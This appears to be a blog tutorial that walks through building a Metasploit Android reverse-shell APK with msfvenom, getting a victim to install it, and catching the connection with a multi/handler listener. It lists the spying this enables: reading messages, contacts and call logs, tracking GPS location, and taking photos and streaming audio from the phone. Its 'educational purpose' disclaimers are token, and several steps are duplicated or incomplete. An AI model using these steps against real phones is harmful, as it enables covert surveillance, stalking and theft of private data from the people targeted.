NOTE: Hacking is a
illegal activity so don't try on anyone. this tutorial is Only for educational
purpose. If you want to use this tutorial
for miscellaneous purpose please stop reading.
• Get contacts (and all theirs information)
• Get call logs
• Get all messages
• Location by GPS/Network
• Monitoring received messages in live
• Monitoring phone state in live (call received,
call sent, call missed..)
• Take a picture from the camera
• Stream sound from microphone (or other
sources..)
• Streaming video (for activity based client
only)
• Do a toast
• Send a text message
• Give call
• Open an URL in the default browser
• Do vibrate the phone
Now Start...
(Using Kali Operating System-Download Now)
Step:1 Open
terminal (CTRL + ALT + T)
One More Method To Open Terminal Click
Application Open Metaspliot Framework
Step:2 We will
utilize Metasploit payload framework to create exploit Type cd Desktop Hit
Enter
msfpayload android/meterpreter/reverse_tcp
LHOST= (attacker_ip_address)
LPORT=(port_to_receive_connection)
(Kali live
2.0 or Greater Version)
Msfvenom-p android/meterpreter/reverse_tcp
LHOST=(attacker_ip_address)
LPORT=(port_to_receive_connection)
Msfvenom-p android/meterpreter/reverse_tcp
LHOST=(attacker_ip_address)
LPORT=(port_to_receive_connection)
As described above that attacker
IP address is 162.152.5.62, below is our screenshot when executed the command
(Now Show The Payload On Desktop File Name=DEV.apk)
Step:3 Send
this apk file over to your victim’s phone And Install victim Phone
Step:4 Now going back to your open msfconsole window , type in the following to start your DEV.apk
Step:4 Now going back to your open msfconsole window , type in the following to start your DEV.apk
Step:5 Because
our payload is reverse_tcp where attacker expect the victim to connect back to
attacker machine, attacker needs to set up the handler to handle incoming
connections to the port already specified above.
Open New Terminal And Type msfconsole (Hit
Enter) to go to Metasploit console.
Wait ......
Wait ......
Step:6 use exploit/multi/handler
Step:7 set LPORT ( the port you used in DEV.apk )
Step:8 exploit
Step:7 set LPORT ( the port you used in DEV.apk )
Step:8 exploit
Legal Disclaimer : This
tutorial is completely for educational purpose only. For any misuse of this
tutorial by any means the author will not be held responsible.
If you have any queries Please comment my
posts.
0 Comments